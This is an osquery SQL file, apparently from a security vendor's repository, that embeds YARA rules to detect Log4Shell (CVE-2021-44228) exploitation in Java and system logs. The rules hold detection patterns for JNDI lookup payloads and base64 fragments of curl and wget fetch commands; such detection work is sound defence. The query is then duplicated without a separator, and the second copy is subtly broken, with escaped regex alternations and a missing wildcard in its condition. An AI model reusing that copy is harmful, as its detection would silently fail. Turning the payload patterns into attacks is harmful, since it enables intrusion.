ureddy-uptycs/osquery_yara_rule.sql

## osquery_yara_rule.sql
SELECT *
FROM yara
WHERE
(path IN (SELECT path FROM process_open_files WHERE pid IN (SELECT pid FROM processes WHERE name = 'java') AND path LIKE '%.log' AND path NOT LIKE '%kafka%')
  OR path LIKE '/var/log/%%' )
AND (
rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 60
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
   condition:
      1 of them
}' OR
rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
   condition:
      $x1 and not 1 of ($fp*)
}' OR
rule = 'rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}')
AND count > 0
AND path NOT LIKE '%osqueryd.worker.log'
	SELECT *
	FROM yara
	WHERE
	(path IN (SELECT path FROM process_open_files WHERE pid IN (SELECT pid FROM processes WHERE name = 'java') AND path LIKE '%.log' AND path NOT LIKE '%kafka%')
	OR path LIKE '/var/log/%%' )
	AND (
	rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
	meta:
	description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
	author = "Florian Roth"
	reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
	date = "2021-12-10"
	score = 60
	strings:
	$x1 = "${jndi:ldap:/"
	$x2 = "${jndi:rmi:/"
	$x3 = "${jndi:ldaps:/"
	$x4 = "${jndi:dns:/"
	condition:
	1 of them
	}' OR
	rule = 'rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
	meta:
	description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
	author = "Florian Roth"
	reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
	date = "2021-12-10"
	score = 80
	strings:
	$x1 = /\$\{jndi:(ldap\|ldaps\|rmi\|dns):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
	$fp1r = /(ldap\|rmi\|ldaps\|dns):\/[\/]?(127\.0\.0\.1\|192\.168\.\|172\.[1-3][0-9]\.\|10\.)/
	condition:
	$x1 and not 1 of ($fp*)
	}' OR
	rule = 'rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
	meta:
	description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
	author = "Florian Roth"
	reference = "https://twitter.com/Reelix/status/1469327487243071493"
	date = "2021-12-10"
	score = 70
	strings:
	/* curl -s */
	$sa1 = "Y3VybCAtcy"
	$sa2 = "N1cmwgLXMg"
	$sa3 = "jdXJsIC1zI"
	/* \|wget -q -O- */
	$sb1 = "fHdnZXQgLXEgLU8tI"
	$sb2 = "x3Z2V0IC1xIC1PLS"
	$sb3 = "8d2dldCAtcSAtTy0g"
	condition:
	1 of ($sa) and 1 of ($sb)
	}')
	AND count > 0
	AND path NOT LIKE '%osqueryd.worker.log'